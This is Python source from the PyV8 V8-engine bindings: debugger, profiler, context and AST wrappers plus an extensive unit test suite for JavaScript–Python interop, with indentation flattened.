def onDebugEvent(self, type, state, evt):
if type == JSDebugEvent.Break:
if self.onBreak: self.onBreak(JSDebugEvent.BreakEvent(evt))
elif type == JSDebugEvent.Exception:
if self.onException: self.onException(JSDebugEvent.ExceptionEvent(evt))
elif type == JSDebugEvent.NewFunction:
if self.onNewFunction: self.onNewFunction(JSDebugEvent.NewFunctionEvent(evt))
elif type == JSDebugEvent.BeforeCompile:
if self.onBeforeCompile: self.onBeforeCompile(JSDebugEvent.BeforeCompileEvent(evt))
elif type == JSDebugEvent.AfterCompile:
if self.onAfterCompile: self.onAfterCompile(JSDebugEvent.AfterCompileEvent(evt))
def onDispatchDebugMessages(self):
return True
def debugBreak(self):
_PyV8.debug().debugBreak()
def debugBreakForCommand(self):
_PyV8.debug().debugBreakForCommand()
def cancelDebugBreak(self):
_PyV8.debug().cancelDebugBreak()
def processDebugMessages(self):
_PyV8.debug().processDebugMessages()
def sendCommand(self, cmd, *args, **kwds):
request = json.dumps({
'seq': self.nextSeq(),
'type': 'request',
'command': cmd,
'arguments': kwds
})
_PyV8.debug().sendCommand(request)
return request
def debugContinue(self, action='next', steps=1):
return self.sendCommand('continue', stepaction=action)
def stepNext(self, steps=1):
"""Step to the next statement in the current function."""
return self.debugContinue(action='next', steps=steps)
def stepIn(self, steps=1):
"""Step into new functions invoked or the next statement in the current function."""
return self.debugContinue(action='in', steps=steps)
def stepOut(self, steps=1):
"""Step out of the current function."""
return self.debugContinue(action='out', steps=steps)
def stepMin(self, steps=1):
"""Perform a minimum step in the current function."""
return self.debugContinue(action='out', steps=steps)
class JSProfiler(_PyV8.JSProfiler):
@property
def logs(self):
pos = 0
while True:
size, buf = self.getLogLines(pos)
if size == 0:
break
for line in buf.split('\n'):
yield line
pos += size
profiler = JSProfiler()
JSObjectSpace = _PyV8.JSObjectSpace
JSAllocationAction = _PyV8.JSAllocationAction
class JSEngine(_PyV8.JSEngine):
def __init__(self):
_PyV8.JSEngine.__init__(self)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
del self
JSScript = _PyV8.JSScript
JSStackTrace = _PyV8.JSStackTrace
JSStackTrace.Options = _PyV8.JSStackTraceOptions
JSStackFrame = _PyV8.JSStackFrame
class JSIsolate(_PyV8.JSIsolate):
def __enter__(self):
self.enter()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.leave()
del self
class JSContext(_PyV8.JSContext):
def __init__(self, obj=None, extensions=None, ctxt=None):
if JSLocker.active:
self.lock = JSLocker()
self.lock.enter()
if ctxt:
_PyV8.JSContext.__init__(self, ctxt)
else:
_PyV8.JSContext.__init__(self, obj, extensions or [])
def __enter__(self):
self.enter()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.leave()
if hasattr(JSLocker, 'lock'):
self.lock.leave()
self.lock = None
del self
# contribute by marc boeker <http://code.google.com/u/marc.boeker/>
def convert(obj):
if type(obj) == _PyV8.JSArray:
return [convert(v) for v in obj]
if type(obj) == _PyV8.JSObject:
return dict([[str(k), convert(obj.__getattr__(str(k)))] for k in (obj.__dir__() if is_py3k else obj.__members__)])
return obj
class AST:
Scope = _PyV8.AstScope
VarMode = _PyV8.AstVariableMode
Var = _PyV8.AstVariable
Label = _PyV8.AstLabel
NodeType = _PyV8.AstNodeType
Node = _PyV8.AstNode
Statement = _PyV8.AstStatement
Expression = _PyV8.AstExpression
Breakable = _PyV8.AstBreakableStatement
Block = _PyV8.AstBlock
Declaration = _PyV8.AstDeclaration
VariableDeclaration = _PyV8.AstVariableDeclaration
Module = _PyV8.AstModule
ModuleDeclaration = _PyV8.AstModuleDeclaration
ModuleLiteral = _PyV8.AstModuleLiteral
ModuleVariable = _PyV8.AstModuleVariable
ModulePath = _PyV8.AstModulePath
Iteration = _PyV8.AstIterationStatement
DoWhile = _PyV8.AstDoWhileStatement
While = _PyV8.AstWhileStatement
For = _PyV8.AstForStatement
ForIn = _PyV8.AstForInStatement
ExpressionStatement = _PyV8.AstExpressionStatement
Continue = _PyV8.AstContinueStatement
Break = _PyV8.AstBreakStatement
Return = _PyV8.AstReturnStatement
With = _PyV8.AstWithStatement
Case = _PyV8.AstCaseClause
Switch = _PyV8.AstSwitchStatement
Try = _PyV8.AstTryStatement
TryCatch = _PyV8.AstTryCatchStatement
TryFinally = _PyV8.AstTryFinallyStatement
Debugger = _PyV8.AstDebuggerStatement
Empty = _PyV8.AstEmptyStatement
Literal = _PyV8.AstLiteral
MaterializedLiteral = _PyV8.AstMaterializedLiteral
PropertyKind = _PyV8.AstPropertyKind
ObjectProperty = _PyV8.AstObjectProperty
Object = _PyV8.AstObjectLiteral
RegExp = _PyV8.AstRegExpLiteral
Array = _PyV8.AstArrayLiteral
VarProxy = _PyV8.AstVariableProxy
Property = _PyV8.AstProperty
Call = _PyV8.AstCall
CallNew = _PyV8.AstCallNew
CallRuntime = _PyV8.AstCallRuntime
Op = _PyV8.AstOperation
UnaryOp = _PyV8.AstUnaryOperation
BinOp = _PyV8.AstBinaryOperation
CountOp = _PyV8.AstCountOperation
CompOp = _PyV8.AstCompareOperation
Conditional = _PyV8.AstConditional
Assignment = _PyV8.AstAssignment
Throw = _PyV8.AstThrow
Function = _PyV8.AstFunctionLiteral
SharedFunction = _PyV8.AstSharedFunctionInfoLiteral
This = _PyV8.AstThisFunction
from datetime import *
import unittest
import traceback
if is_py3k:
def toNativeString(s):
return s
def toUnicodeString(s):
return s
else:
def toNativeString(s, encoding='utf-8'):
return s.encode(encoding) if isinstance(s, str) else s
def toUnicodeString(s, encoding='utf-8'):
return s if isinstance(s, str) else str(s, encoding)
class TestContext(unittest.TestCase):
def testMultiNamespace(self):
self.assertTrue(not bool(JSContext.inContext))
self.assertTrue(not bool(JSContext.entered))
class Global(object):
name = "global"
g = Global()
with JSContext(g) as ctxt:
self.assertTrue(bool(JSContext.inContext))
self.assertEqual(g.name, str(JSContext.entered.locals.name))
self.assertEqual(g.name, str(JSContext.current.locals.name))
class Local(object):
name = "local"
l = Local()
with JSContext(l):
self.assertTrue(bool(JSContext.inContext))
self.assertEqual(l.name, str(JSContext.entered.locals.name))
self.assertEqual(l.name, str(JSContext.current.locals.name))
self.assertTrue(bool(JSContext.inContext))
self.assertEqual(g.name, str(JSContext.entered.locals.name))
self.assertEqual(g.name, str(JSContext.current.locals.name))
self.assertTrue(not bool(JSContext.entered))
self.assertTrue(not bool(JSContext.inContext))
def _testMultiContext(self):
# Create an environment
with JSContext() as ctxt0:
ctxt0.securityToken = "password"
global0 = ctxt0.locals
global0.custom = 1234
self.assertEqual(1234, int(global0.custom))
# Create an independent environment
with JSContext() as ctxt1:
ctxt1.securityToken = ctxt0.securityToken
global1 = ctxt1.locals
global1.custom = 1234
with ctxt0:
self.assertEqual(1234, int(global0.custom))
self.assertEqual(1234, int(global1.custom))
# Now create a new context with the old global
with JSContext(global1) as ctxt2:
ctxt2.securityToken = ctxt1.securityToken
with ctxt1:
self.assertEqual(1234, int(global1.custom))
def _testSecurityChecks(self):
with JSContext() as env1:
env1.securityToken = "foo"
# Create a function in env1.
env1.eval("spy=function(){return spy;}")
spy = env1.locals.spy
self.assertTrue(isinstance(spy, _PyV8.JSFunction))
# Create another function accessing global objects.
env1.eval("spy2=function(){return 123;}")
spy2 = env1.locals.spy2
self.assertTrue(isinstance(spy2, _PyV8.JSFunction))
# Switch to env2 in the same domain and invoke spy on env2.
env2 = JSContext()
env2.securityToken = "foo"
with env2:
result = spy.apply(env2.locals)
self.assertTrue(isinstance(result, _PyV8.JSFunction))
env2.securityToken = "bar"
# Call cross_domain_call, it should throw an exception
with env2:
self.assertRaises(JSError, spy2.apply, env2.locals)
def _testCrossDomainDelete(self):
with JSContext() as env1:
env2 = JSContext()
# Set to the same domain.
env1.securityToken = "foo"
env2.securityToken = "foo"
env1.locals.prop = 3
env2.locals.env1 = env1.locals
# Change env2 to a different domain and delete env1.prop.
#env2.securityToken = "bar"
self.assertEqual(3, int(env1.eval("prop")))
with env2:
self.assertEqual(3, int(env2.eval("this.env1.prop")))
self.assertEqual("false", str(env2.eval("delete env1.prop")))
# Check that env1.prop still exists.
self.assertEqual(3, int(env1.locals.prop))
class TestWrapper(unittest.TestCase):
def testObject(self):
with JSContext() as ctxt:
o = ctxt.eval("new Object()")
self.assertTrue(hash(o) > 0)
o1 = o.clone()
self.assertEqual(hash(o1), hash(o))
self.assertTrue(o != o1)
self.assertRaises(UnboundLocalError, o.clone)
def testAutoConverter(self):
with JSContext() as ctxt:
ctxt.eval("""
var_i = 1;
var_f = 1.0;
var_s = "test";
var_b = true;
var_s_obj = new String("test");
var_b_obj = new Boolean(true);
var_f_obj = new Number(1.5);
""")
vars = ctxt.locals
var_i = vars.var_i
self.assertTrue(var_i)
self.assertEqual(1, int(var_i))
var_f = vars.var_f
self.assertTrue(var_f)
self.assertEqual(1.0, float(vars.var_f))
var_s = vars.var_s
self.assertTrue(var_s)
self.assertEqual("test", str(vars.var_s))
var_b = vars.var_b
self.assertTrue(var_b)
self.assertTrue(bool(var_b))
self.assertEqual("test", vars.var_s_obj)
self.assertTrue(vars.var_b_obj)
self.assertEqual(1.5, vars.var_f_obj)
attrs = dir(ctxt.locals)
self.assertTrue(attrs)
self.assertTrue("var_i" in attrs)
self.assertTrue("var_f" in attrs)
self.assertTrue("var_s" in attrs)
self.assertTrue("var_b" in attrs)
self.assertTrue("var_s_obj" in attrs)
self.assertTrue("var_b_obj" in attrs)
self.assertTrue("var_f_obj" in attrs)
def testExactConverter(self):
class MyInteger(int, JSClass):
pass
class MyString(str, JSClass):
pass
class MyUnicode(str, JSClass):
pass
class MyDateTime(time, JSClass):
pass
class Global(JSClass):
var_bool = True
var_int = 1
var_float = 1.0
var_str = 'str'
var_unicode = 'unicode'
var_datetime = datetime.now()
var_date = date.today()
var_time = time()
var_myint = MyInteger()
var_mystr = MyString('mystr')
var_myunicode = MyUnicode('myunicode')
var_mytime = MyDateTime()
with JSContext(Global()) as ctxt:
typename = ctxt.eval("(function (name) { return this[name].constructor.name; })")
typeof = ctxt.eval("(function (name) { return typeof(this[name]); })")
self.assertEqual('Boolean', typename('var_bool'))
self.assertEqual('Number', typename('var_int'))
self.assertEqual('Number', typename('var_float'))
self.assertEqual('String', typename('var_str'))
self.assertEqual('String', typename('var_unicode'))
self.assertEqual('Date', typename('var_datetime'))
self.assertEqual('Date', typename('var_date'))
self.assertEqual('Date', typename('var_time'))
self.assertEqual('MyInteger', typename('var_myint'))
self.assertEqual('MyString', typename('var_mystr'))
self.assertEqual('MyUnicode', typename('var_myunicode'))
self.assertEqual('MyDateTime', typename('var_mytime'))
self.assertEqual('object', typeof('var_myint'))
self.assertEqual('object', typeof('var_mystr'))
self.assertEqual('object', typeof('var_myunicode'))
self.assertEqual('object', typeof('var_mytime'))
def testJavascriptWrapper(self):
with JSContext() as ctxt:
self.assertEqual(type(None), type(ctxt.eval("null")))
self.assertEqual(type(None), type(ctxt.eval("undefined")))
self.assertEqual(bool, type(ctxt.eval("true")))
self.assertEqual(str, type(ctxt.eval("'test'")))
self.assertEqual(int, type(ctxt.eval("123")))
self.assertEqual(float, type(ctxt.eval("3.14")))
self.assertEqual(datetime, type(ctxt.eval("new Date()")))
self.assertEqual(JSArray, type(ctxt.eval("[1, 2, 3]")))
self.assertEqual(JSFunction, type(ctxt.eval("(function() {})")))
self.assertEqual(JSObject, type(ctxt.eval("new Object()")))
def testPythonWrapper(self):
with JSContext() as ctxt:
typeof = ctxt.eval("(function type(value) { return typeof value; })")
protoof = ctxt.eval("(function protoof(value) { return Object.prototype.toString.apply(value); })")
self.assertEqual('[object Null]', protoof(None))
self.assertEqual('boolean', typeof(True))
self.assertEqual('number', typeof(123))
self.assertEqual('number', typeof(3.14))
self.assertEqual('string', typeof('test'))
self.assertEqual('string', typeof('test'))
self.assertEqual('[object Date]', protoof(datetime.now()))
self.assertEqual('[object Date]', protoof(date.today()))
self.assertEqual('[object Date]', protoof(time()))
def test():
pass
self.assertEqual('[object Function]', protoof(abs))
self.assertEqual('[object Function]', protoof(test))
self.assertEqual('[object Function]', protoof(self.testPythonWrapper))
self.assertEqual('[object Function]', protoof(int))
def testFunction(self):
with JSContext() as ctxt:
func = ctxt.eval("""
(function ()
{
function a()
{
return "abc";
}
return a();
})
""")
self.assertEqual("abc", str(func()))
self.assertTrue(func != None)
self.assertFalse(func == None)
func = ctxt.eval("(function test() {})")
self.assertEqual("test", func.name)
self.assertEqual("", func.resname)
self.assertEqual(0, func.linenum)
self.assertEqual(14, func.colnum)
self.assertEqual(0, func.lineoff)
self.assertEqual(0, func.coloff)
#TODO fix me, why the setter doesn't work?
# func.name = "hello"
# it seems __setattr__ was called instead of CJavascriptFunction::SetName
func.setName("hello")
self.assertEqual("hello", func.name)
def testCall(self):
class Hello(object):
def __call__(self, name):
return "hello " + name
class Global(JSClass):
hello = Hello()
with JSContext(Global()) as ctxt:
self.assertEqual("hello flier", ctxt.eval("hello('flier')"))
def testJSFunction(self):
with JSContext() as ctxt:
hello = ctxt.eval("(function (name) { return 'hello ' + name; })")
self.assertTrue(isinstance(hello, _PyV8.JSFunction))
self.assertEqual("hello flier", hello('flier'))
self.assertEqual("hello flier", hello.invoke(['flier']))
obj = ctxt.eval("({ 'name': 'flier', 'hello': function (name) { return 'hello ' + name + ' from ' + this.name; }})")
hello = obj.hello
self.assertTrue(isinstance(hello, JSFunction))
self.assertEqual("hello flier from flier", hello('flier'))
tester = ctxt.eval("({ 'name': 'tester' })")
self.assertEqual("hello flier from tester", hello.invoke(tester, ['flier']))
self.assertEqual("hello flier from json", hello.apply({ 'name': 'json' }, ['flier']))
def testConstructor(self):
with JSContext() as ctx:
ctx.eval("""
var Test = function() {
this.trySomething();
};
Test.prototype.trySomething = function() {
this.name = 'flier';
};
var Test2 = function(first_name, last_name) {
this.name = first_name + ' ' + last_name;
};
""")
self.assertTrue(isinstance(ctx.locals.Test, _PyV8.JSFunction))
test = JSObject.create(ctx.locals.Test)
self.assertTrue(isinstance(ctx.locals.Test, _PyV8.JSObject))
self.assertEqual("flier", test.name);
test2 = JSObject.create(ctx.locals.Test2, ('Flier', 'Lu'))
self.assertEqual("Flier Lu", test2.name);
test3 = JSObject.create(ctx.locals.Test2, ('Flier', 'Lu'), { 'email': 'flier.lu@gmail.com' })
self.assertEqual("flier.lu@gmail.com", test3.email);
def testJSError(self):
with JSContext() as ctxt:
try:
ctxt.eval('throw "test"')
self.fail()
except:
self.assertTrue(JSError, sys.exc_info()[0])
def testErrorInfo(self):
with JSContext() as ctxt:
with JSEngine() as engine:
try:
engine.compile("""
function hello()
{
throw Error("hello world");
}
hello();""", "test", 10, 10).run()
self.fail()
except JSError as e:
self.assertTrue(str(e).startswith('JSError: Error: hello world ( test @ 14 : 34 ) ->'))
self.assertEqual("Error", e.name)
self.assertEqual("hello world", e.message)
self.assertEqual("test", e.scriptName)
self.assertEqual(14, e.lineNum)
self.assertEqual(102, e.startPos)
self.assertEqual(103, e.endPos)
self.assertEqual(34, e.startCol)
self.assertEqual(35, e.endCol)
self.assertEqual('throw Error("hello world");', e.sourceLine.strip())
self.assertEqual('Error: hello world\n' +
' at Error (<anonymous>)\n' +
' at hello (test:14:35)\n' +
' at test:17:25', e.stackTrace)
def testParseStack(self):
self.assertEqual([
('Error', 'unknown source', None, None),
('test', 'native', None, None),
('<anonymous>', 'test0', 3, 5),
('f', 'test1', 2, 19),
('g', 'test2', 1, 15),
(None, 'test3', 1, None),
(None, 'test3', 1, 1),
], JSError.parse_stack("""Error: err
at Error (unknown source)
at test (native)
at new <anonymous> (test0:3:5)
at f (test1:2:19)
at g (test2:1:15)
at test3:1
at test3:1:1"""))
def testStackTrace(self):
class Global(JSClass):
def GetCurrentStackTrace(self, limit):
return JSStackTrace.GetCurrentStackTrace(4, JSStackTrace.Options.Detailed)
with JSContext(Global()) as ctxt:
st = ctxt.eval("""
function a()
{
return GetCurrentStackTrace(10);
}
function b()
{
return eval("a()");
}
function c()
{
return new b();
}
c();""", "test")
self.assertEqual(4, len(st))
self.assertEqual("\tat a (test:4:28)\n\tat (eval)\n\tat b (test:8:28)\n\tat c (test:12:28)\n", str(st))
self.assertEqual("test.a (4:28)\n. (1:1) eval\ntest.b (8:28) constructor\ntest.c (12:28)",
"\n".join(["%s.%s (%d:%d)%s%s" % (
f.scriptName, f.funcName, f.lineNum, f.column,
' eval' if f.isEval else '',
' constructor' if f.isConstructor else '') for f in st]))
def testPythonException(self):
class Global(JSClass):
def raiseException(self):
raise RuntimeError("Hello")
with JSContext(Global()) as ctxt:
r = ctxt.eval("""
msg ="";
try
{
this.raiseException()
}
catch(e)
{
msg += "catch " + e + ";";
}
finally
{
msg += "finally";
}""")
self.assertEqual("catch Error: Hello;finally", str(ctxt.locals.msg))
def testExceptionMapping(self):
class TestException(Exception):
pass
class Global(JSClass):
def raiseIndexError(self):
return [1, 2, 3][5]
def raiseAttributeError(self):
None.hello()
def raiseSyntaxError(self):
eval("???")
def raiseTypeError(self):
int(sys)
def raiseNotImplementedError(self):
raise NotImplementedError("Not support")
def raiseExceptions(self):
raise TestException()
with JSContext(Global()) as ctxt:
ctxt.eval("try { this.raiseIndexError(); } catch (e) { msg = e; }")
self.assertEqual("RangeError: list index out of range", str(ctxt.locals.msg))
ctxt.eval("try { this.raiseAttributeError(); } catch (e) { msg = e; }")
self.assertEqual("ReferenceError: 'NoneType' object has no attribute 'hello'", str(ctxt.locals.msg))
ctxt.eval("try { this.raiseSyntaxError(); } catch (e) { msg = e; }")
self.assertEqual("SyntaxError: invalid syntax", str(ctxt.locals.msg))
ctxt.eval("try { this.raiseTypeError(); } catch (e) { msg = e; }")
self.assertEqual("TypeError: int() argument must be a string or a number, not 'module'", str(ctxt.locals.msg))
ctxt.eval("try { this.raiseNotImplementedError(); } catch (e) { msg = e; }")
self.assertEqual("Error: Not support", str(ctxt.locals.msg))
self.assertRaises(TestException, ctxt.eval, "this.raiseExceptions();")
def testArray(self):
with JSContext() as ctxt:
array = ctxt.eval("""
var array = new Array();
for (i=0; i<10; i++)
{
array[i] = 10-i;
}
array;
""")
self.assertTrue(isinstance(array, _PyV8.JSArray))
self.assertEqual(10, len(array))
self.assertTrue(5 in array)
self.assertFalse(15 in array)
self.assertEqual(10, len(array))
for i in range(10):
self.assertEqual(10-i, array[i])
array[5] = 0
self.assertEqual(0, array[5])
del array[5]
self.assertEqual(None, array[5])
# array [10, 9, 8, 7, 6, None, 4, 3, 2, 1]
# array[4:7] 4^^^^^^^^^7
# array[-3:-1] -3^^^^^^-1
# array[0:0] []
self.assertEqual([6, None, 4], array[4:7])
self.assertEqual([3, 2], array[-3:-1])
self.assertEqual([], array[0:0])
array[1:3] = [9, 9, 9]
self.assertEqual([10, 9, 9, 9, 7, 6, None, 4, 3, 2, 1], list(array))
array[5:8] = [8, 8]
self.assertEqual([10, 9, 9, 9, 7, 8, 8, 3, 2, 1], list(array))
del array[1:4]
self.assertEqual([10, 7, 8, 8, 3, 2, 1], list(array))
ctxt.locals.array1 = JSArray(5)
ctxt.locals.array2 = JSArray([1, 2, 3, 4, 5])
for i in range(len(ctxt.locals.array2)):
ctxt.locals.array1[i] = ctxt.locals.array2[i] * 10
ctxt.eval("""
var sum = 0;
for (i=0; i<array1.length; i++)
sum += array1[i]
for (i=0; i<array2.length; i++)
sum += array2[i]
""")
self.assertEqual(165, ctxt.locals.sum)
ctxt.locals.array3 = [1, 2, 3, 4, 5]
self.assertTrue(ctxt.eval('array3[1] === 2'))
self.assertTrue(ctxt.eval('array3[9] === undefined'))
args = [
["a = Array(7); for(i=0; i<a.length; i++) a[i] = i; a[3] = undefined; a[a.length-1]; a", "0,1,2,,4,5,6", [0, 1, 2, None, 4, 5, 6]],
["a = Array(7); for(i=0; i<a.length - 1; i++) a[i] = i; a[a.length-1]; a", "0,1,2,3,4,5,", [0, 1, 2, 3, 4, 5, None]],
["a = Array(7); for(i=1; i<a.length; i++) a[i] = i; a[a.length-1]; a", ",1,2,3,4,5,6", [None, 1, 2, 3, 4, 5, 6]]
]
for arg in args:
array = ctxt.eval(arg[0])
self.assertEqual(arg[1], str(array))
self.assertEqual(arg[2], [array[i] for i in range(len(array))])
self.assertEqual(3, ctxt.eval("(function (arr) { return arr.length; })")(JSArray([1, 2, 3])))
self.assertEqual(2, ctxt.eval("(function (arr, idx) { return arr[idx]; })")(JSArray([1, 2, 3]), 1))
self.assertEqual('[object Array]', ctxt.eval("(function (arr) { return Object.prototype.toString.call(arr); })")(JSArray([1, 2, 3])))
self.assertEqual('[object Array]', ctxt.eval("(function (arr) { return Object.prototype.toString.call(arr); })")(JSArray((1, 2, 3))))
self.assertEqual('[object Array]', ctxt.eval("(function (arr) { return Object.prototype.toString.call(arr); })")(JSArray(list(range(3)))))
[x for x in JSArray([1,2,3])]
def testMultiDimArray(self):
with JSContext() as ctxt:
ret = ctxt.eval("""
({
'test': function(){
return [
[ 1, 'abla' ],
[ 2, 'ajkss' ],
]
}
})
""").test()
self.assertEqual([[1, 'abla'], [2, 'ajkss']], convert(ret))
def testLazyConstructor(self):
class Globals(JSClass):
def __init__(self):
self.array=JSArray([1,2,3])
with JSContext(Globals()) as ctxt:
self.assertEqual(2, ctxt.eval("""array[1]"""))
def testForEach(self):
class NamedClass(object):
foo = 1
def __init__(self):
self.bar = 2
@property
def foobar(self):
return self.foo + self.bar
def gen(x):
for i in range(x):
yield i
with JSContext() as ctxt:
func = ctxt.eval("""(function (k) {
var result = [];
for (var prop in k) {
result.push(prop);
}
return result;
})""")
self.assertTrue(set(["bar", "foo", "foobar"]).issubset(set(func(NamedClass()))))
self.assertEqual(["0", "1", "2"], list(func([1, 2, 3])))
self.assertEqual(["0", "1", "2"], list(func((1, 2, 3))))
self.assertEqual(["1", "2", "3"], list(func({1:1, 2:2, 3:3})))
self.assertEqual(["0", "1", "2"], list(func(gen(3))))
def testDict(self):
with JSContext() as ctxt:
obj = ctxt.eval("var r = { 'a' : 1, 'b' : 2 }; r")
self.assertEqual(1, obj.a)
self.assertEqual(2, obj.b)
self.assertEqual({ 'a' : 1, 'b' : 2 }, dict(obj))
self.assertEqual({ 'a': 1,
'b': [1, 2, 3],
'c': { 'str' : 'goofy',
'float' : 1.234,
'obj' : { 'name': 'john doe' }},
'd': True,
'e': None },
convert(ctxt.eval("""var x =
{ a: 1,
b: [1, 2, 3],
c: { str: 'goofy',
float: 1.234,
obj: { name: 'john doe' }},
d: true,
e: null }; x""")))
def testDate(self):
with JSContext() as ctxt:
now1 = ctxt.eval("new Date();")
self.assertTrue(now1)
now2 = datetime.utcnow()
delta = now2 - now1 if now2 > now1 else now1 - now2
self.assertTrue(delta < timedelta(seconds=1))
func = ctxt.eval("(function (d) { return d.toString(); })")
now = datetime.now()
self.assertTrue(str(func(now)).startswith(now.strftime("%a %b %d %Y %H:%M:%S")))
def testUnicode(self):
with JSContext() as ctxt:
self.assertEqual("人", toUnicodeString(ctxt.eval("\"人\"")))
self.assertEqual("é", toUnicodeString(ctxt.eval("\"é\"")))
func = ctxt.eval("(function (msg) { return msg.length; })")
self.assertEqual(2, func("测试"))
def testClassicStyleObject(self):
class FileSystemWarpper:
@property
def cwd(self):
return os.getcwd()
class Global:
@property
def fs(self):
return FileSystemWarpper()
with JSContext(Global()) as ctxt:
self.assertEqual(os.getcwd(), ctxt.eval("fs.cwd"))
def testRefCount(self):
count = sys.getrefcount(None)
class Global(JSClass):
pass
with JSContext(Global()) as ctxt:
ctxt.eval("""
var none = null;
""")
self.assertEqual(count+1, sys.getrefcount(None))
ctxt.eval("""
var none = null;
""")
self.assertEqual(count+1, sys.getrefcount(None))
def testProperty(self):
class Global(JSClass):
def __init__(self, name):
self._name = name
def getname(self):
return self._name
def setname(self, name):
self._name = name
def delname(self):
self._name = 'deleted'
name = property(getname, setname, delname)
g = Global('world')
with JSContext(g) as ctxt:
self.assertEqual('world', ctxt.eval("name"))
self.assertEqual('flier', ctxt.eval("this.name = 'flier';"))
self.assertEqual('flier', ctxt.eval("name"))
self.assertTrue(ctxt.eval("delete name"))
###
# FIXME replace the global object with Python object
#
#self.assertEqual('deleted', ctxt.eval("name"))
#ctxt.eval("__defineGetter__('name', function() { return 'fixed'; });")
#self.assertEqual('fixed', ctxt.eval("name"))
def testGetterAndSetter(self):
class Global(JSClass):
def __init__(self, testval):
self.testval = testval
with JSContext(Global("Test Value A")) as ctxt:
self.assertEqual("Test Value A", ctxt.locals.testval)
ctxt.eval("""
this.__defineGetter__("test", function() {
return this.testval;
});
this.__defineSetter__("test", function(val) {
this.testval = val;
});
""")
self.assertEqual("Test Value A", ctxt.locals.test)
ctxt.eval("test = 'Test Value B';")
self.assertEqual("Test Value B", ctxt.locals.test)
def testDestructor(self):
import gc
owner = self
owner.deleted = False
class Hello(object):
def say(self):
pass
def __del__(self):
owner.deleted = True
def test():
with JSContext() as ctxt:
fn = ctxt.eval("(function (obj) { obj.say(); })")
obj = Hello()
self.assertEqual(2, sys.getrefcount(obj))
fn(obj)
self.assertEqual(4, sys.getrefcount(obj))
del obj
test()
self.assertFalse(owner.deleted)
JSEngine.collect()
gc.collect()
self.assertTrue(owner.deleted)
def testNullInString(self):
with JSContext() as ctxt:
fn = ctxt.eval("(function (s) { return s; })")
self.assertEqual("hello \0 world", fn("hello \0 world"))
def testLivingObjectCache(self):
class Global(JSClass):
i = 1
b = True
o = object()
with JSContext(Global()) as ctxt:
self.assertTrue(ctxt.eval("i == i"))
self.assertTrue(ctxt.eval("b == b"))
self.assertTrue(ctxt.eval("o == o"))
def testNamedSetter(self):
class Obj(JSClass):
@property
def p(self):
return self._p
@p.setter
def p(self, value):
self._p = value
class Global(JSClass):
def __init__(self):
self.obj = Obj()
self.d = {}
self.p = None
with JSContext(Global()) as ctxt:
ctxt.eval("""
x = obj;
x.y = 10;
x.p = 10;
d.y = 10;
""")
self.assertEqual(10, ctxt.eval("obj.y"))
self.assertEqual(10, ctxt.eval("obj.p"))
self.assertEqual(10, ctxt.locals.d['y'])
def testWatch(self):
class Obj(JSClass):
def __init__(self):
self.p = 1
class Global(JSClass):
def __init__(self):
self.o = Obj()
with JSContext(Global()) as ctxt:
ctxt.eval("""
o.watch("p", function (id, oldval, newval) {
return oldval + newval;
});
""")
self.assertEqual(1, ctxt.eval("o.p"))
ctxt.eval("o.p = 2;")
self.assertEqual(3, ctxt.eval("o.p"))
ctxt.eval("delete o.p;")
self.assertEqual(None, ctxt.eval("o.p"))
ctxt.eval("o.p = 2;")
self.assertEqual(2, ctxt.eval("o.p"))
ctxt.eval("o.unwatch('p');")
ctxt.eval("o.p = 1;")
self.assertEqual(1, ctxt.eval("o.p"))
def testReferenceError(self):
class Global(JSClass):
def __init__(self):
self.s = self
with JSContext(Global()) as ctxt:
self.assertRaises(ReferenceError, ctxt.eval, 'x')
self.assertTrue(ctxt.eval("typeof(x) === 'undefined'"))
self.assertTrue(ctxt.eval("typeof(String) === 'function'"))
self.assertTrue(ctxt.eval("typeof(s.String) === 'undefined'"))
self.assertTrue(ctxt.eval("typeof(s.z) === 'undefined'"))
def testRaiseExceptionInGetter(self):
class Document(JSClass):
def __getattr__(self, name):
if name == 'y':
raise TypeError()
return JSClass.__getattr__(self, name)
class Global(JSClass):
def __init__(self):
self.document = Document()
with JSContext(Global()) as ctxt:
self.assertEqual(None, ctxt.eval('document.x'))
self.assertRaises(TypeError, ctxt.eval, 'document.y')
class TestMultithread(unittest.TestCase):
def testLocker(self):
self.assertFalse(JSLocker.active)
self.assertFalse(JSLocker.locked)
with JSLocker() as outter_locker:
self.assertTrue(JSLocker.active)
self.assertTrue(JSLocker.locked)
self.assertTrue(outter_locker)
with JSLocker() as inner_locker:
self.assertTrue(JSLocker.locked)
self.assertTrue(outter_locker)
self.assertTrue(inner_locker)
with JSUnlocker() as unlocker:
self.assertFalse(JSLocker.locked)
self.assertTrue(outter_locker)
self.assertTrue(inner_locker)
self.assertTrue(JSLocker.locked)
self.assertTrue(JSLocker.active)
self.assertFalse(JSLocker.locked)
locker = JSLocker()
with JSContext():
self.assertRaises(RuntimeError, locker.__enter__)
self.assertRaises(RuntimeError, locker.__exit__, None, None, None)
del locker
def testMultiPythonThread(self):
import time, threading
class Global:
count = 0
started = threading.Event()
finished = threading.Semaphore(0)
def sleep(self, ms):
time.sleep(ms / 1000.0)
self.count += 1
g = Global()
def run():
with JSContext(g) as ctxt:
ctxt.eval("""
started.wait();
for (i=0; i<10; i++)
{
sleep(100);
}
finished.release();
""")
threading.Thread(target=run).start()
now = time.time()
self.assertEqual(0, g.count)
g.started.set()
g.finished.acquire()
self.assertEqual(10, g.count)
self.assertTrue((time.time() - now) >= 1)
def testMultiJavascriptThread(self):
import time, threading
class Global:
result = []
def add(self, value):
with JSUnlocker():
time.sleep(0.1)
self.result.append(value)
g = Global()
def run():
with JSContext(g) as ctxt:
ctxt.eval("""
for (i=0; i<10; i++)
add(i);
""")
threads = [threading.Thread(target=run), threading.Thread(target=run)]
with JSLocker():
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(20, len(g.result))
def _testPreemptionJavascriptThreads(self):
import time, threading
class Global:
result = []
def add(self, value):
# we use preemption scheduler to switch between threads
# so, just comment the JSUnlocker
#
# with JSUnlocker() as unlocker:
time.sleep(0.1)
self.result.append(value)
g = Global()
def run():
with JSContext(g) as ctxt:
ctxt.eval("""
for (i=0; i<10; i++)
add(i);
""")
threads = [threading.Thread(target=run), threading.Thread(target=run)]
with JSLocker() as locker:
JSLocker.startPreemption(100)
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(20, len(g.result))
class TestEngine(unittest.TestCase):
def testClassProperties(self):
with JSContext() as ctxt:
self.assertTrue(str(JSEngine.version).startswith("3."))
self.assertFalse(JSEngine.dead)
